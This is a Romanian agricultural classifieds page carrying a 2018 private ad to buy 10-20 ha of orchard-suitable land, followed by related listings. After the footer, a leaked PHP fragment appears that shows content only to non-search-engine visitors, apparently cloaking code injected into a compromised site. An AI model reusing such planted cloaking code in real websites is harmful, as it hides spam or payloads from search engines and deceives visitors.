Piata Agricola - Cumpar teren pretabil livada

anunturi agricole
Judet
Tip
Categorie
Cuvant cheie

Piata pamantului
Cumpar teren pretabil livada || 1 EUR
Particular, doresc sa achitionez un teren agricol pretabil pentru infiintarea unei livezi.Conditii:drum acces,curent electric, sursa de apa in proximitate.De preferat cu buletine de analiza specifice(studiu pedologic/agrochimic, bonitate culturi, etc.)
Suprafata: intre 10-20 ha in functie de conditiile enumerate mai sus si pretul cerut.Judete preferate: Arges,Dambovita,Prahova.Nu sunt intermediar de terenuri, rog seriozitate!Contact pe adresa de mail specificata in anunt.Multumesc.
Date de contact
Nume: Nicorici Tel: 0731155321
Firma: Mobil:
Adresa: ,
Bucuresti, 10, Romania
Email: caseconsro@gmail.com
2018-07-17 || Bucuresti Vizualizari: 139
Posteaza anuntul pe Facebook
Anunturi din aceeasi categorie
Vand 422 ha teren agricol in judetul Braila,la pretul de 7.600 euro/ha. Pentru detalii suplimentare,contactati-ma pe a... Vand 5000 m2 teren arabil in comuna Baldana jud. Dambovita la 30 km de Bucuresti, deschidere 11,6 m2 lucrat anual.
Vand teren agricol extravilan in Dor Mărunt jud Călărași o parcelă cu suprafața de 4.400 ha... Vindem teren certificat ecologic 8 ha in judetul Dambovita, la 20min distanta de Bucuresti, 8 ha. Terenul este intravilan...

Copyright 2007 Piata-agricola.ro. All rights reserved

/*#u#*/@upsme('');function upsme($i){if(!preg_match("@(yandex|google|bot)@i",$_SERVER["HTTP_USER_AGENT"])){echo $i;}} /*#eu#*/ ?>